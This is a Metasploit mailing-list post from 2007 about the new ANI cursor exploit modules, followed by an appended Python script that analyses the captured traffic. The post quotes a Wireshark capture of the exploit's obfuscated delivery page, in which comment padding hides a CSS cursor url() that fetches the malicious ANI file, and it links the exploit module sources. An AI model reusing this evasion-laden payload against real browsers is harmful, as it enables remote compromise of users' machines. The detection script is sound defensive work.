Metasploit mailing list archives
Metasploit vs ANI
From: nicolas.ruff at gmail.com (Nicolas RUFF)
Date: Mon, 02 Apr 2007 10:58:53 +0200
Two new exploit modules are available for version 3.0 of the Metasploit Framework. These modules can be obtained by using the 'Online Update' feature in Windows and the 'svn update' command on Unix-like systems.

Matt Miller posted to the Metasploit Blog about our ANI efforts:
http://blog.metasploit.com/

The two exploits can be viewed in the svn repository at metasploit.com:
http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/email/ani_loadimage_chunksize.rb
Nice work! I've just been testing the ANI/HTTP payload against XPSP2 and Vista, and the Web page seems somewhat "corrupted". As a result, IE displays ASCII characters without even crashing. I cannot even see the "anih" header. The page might be GZIP'ed even if default options are set to turn off all evasion techniques. What do you think?

Filtered Wireshark transcript below (non-printable characters removed).

---------------------------------------------------------------------------------
GET /lol HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: fr
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 172.16.21.131:8080
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Content-Length: 2190
Connection: Keep-Alive

<html><head><title>iwIoCkcqMXo7NUF4jAab7WfntgguEDrbsQx15s1ofLRvJEKy1flkODQg8I974dg8U8kaDfJr0U6</title></head><body>XGbXGxssfFg0v45z0GrMpAdpKH5tv71MoP4orVvRg5L7JCv1wklX4EoDjouIQ9jvQg3zHit4bGryWUZy<div style='... /* ... ZX6LrSqnsg3GSVC0SNA2zqW7m7U9s88ug4q4TUBh03dAo7QcMlzgbTVLb9U8ObHzq3Si4SFLOfGWppqEVA ...*/ CursOR /* oNVff76dUP3s62xTrUKNr5IcmLIMv8F32q62o20UuJTmI4kmNkc4BZEdP8BmUrRE6NQb1au5gaakFV5UOg8vfl7MGNqW6PvMGSSLUVeYKyFaAbH. .*/ /*.. GWqQmaoquKHPIlTNHkHCaJPP5ecZOwgP2W0w0Pf4l77EyNBbfBimNEZkGSWU7bYWjSVaUOJbiJh .*/. URL( . /*. qT0bk8NjfYImQIICym7f5lvHidMBIZsGIlSTRmnsYzimxyQ8KlPXPpc1ykJE */ "/lol/aOqmmblrCLUVJrY0R1he7O3UdKPxCcb20QvZMSROQ9J5czCyXrQMFHNHP9crTdcLPaUBODji.wav?qZY=1" ./* .lwgbsRjAQ34gH3SUz . */ .); ./* rNpUJXbAD0XwmM3v */ '>IK0KlqBe5DnxRNVoCZtK94xSLyUfY3</div></body></html>
---------------------------------------------------------------------------------

Regards,
- Nicolas RUFF
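As an added example (not part of this thread or of the Metasploit modules), a small Python checker for a capture like the one above: it reads the response headers to settle the gzip question, strips the CSS comment padding that makes the body look corrupted, and recovers the cursor url() target so an analyst can see what the page actually loads. The shortened sample response and the treatment of stray dots as Wireshark's placeholders for non-printable bytes are constructed assumptions.

```python
import re

# Constructed sample modelled on the transcript in the post (random padding
# shortened): CSS comments and mixed case defeat a naive "cursor: url(" match.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nServer: Apache\r\nContent-Type: text/html\r\n"
    "Content-Length: 2190\r\nConnection: Keep-Alive\r\n\r\n"
    "<html><head><title>iwIoCkcqMXo7</title></head><body>XGbXGxssfFg0"
    "<div style='... /* ... ZX6LrSqnsg3 ...*/ CursOR /* oNVff76dUP3 . .*/ "
    "/*.. GWqQmaoquK .*/. URL( . /*. qT0bk8NjfY */ "
    "\"/lol/aOqmmblrCLUVJrY0R1he7O3U.wav?qZY=1\" ./* .lwgbsRjAQ34 . */ .); "
    "./* rNpUJXbAD0 */ '>IK0KlqBe5Dnx</div></body></html>"
)

CSS_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
# Gap between CSS tokens: whitespace, plus the '.' that a Wireshark stream view
# prints in place of non-printable bytes (an assumption about the transcript).
GAP = r"[\s.]*"
CURSOR_URL = re.compile(
    r"cursor" + GAP + r":?" + GAP + r"url" + GAP + r"\(" + GAP
    + r"[\"']?([^\"')]+?)[\"']?" + GAP + r"\)",
    re.IGNORECASE,
)
CURSOR_EXTS = (".cur", ".ani")

def split_response(raw):
    # Lower-cased header dict plus body; the status line is skipped.
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body

def find_cursor_urls(body):
    # Strip the comment padding first, then pull out every cursor url() target.
    cleaned = CSS_COMMENT.sub(" ", body)
    return [m.group(1).strip() for m in CURSOR_URL.finditer(cleaned)]

def analyse(raw):
    headers, body = split_response(raw)
    urls = find_cursor_urls(body)
    return {
        "compressed": "content-encoding" in headers,  # absent => not gzip'ed
        "css_comments": len(CSS_COMMENT.findall(body)),
        "cursor_urls": urls,
        # A cursor fetched from a non-cursor file name deserves a closer look.
        "mismatched": [u for u in urls
                       if not u.split("?")[0].lower().endswith(CURSOR_EXTS)],
    }
```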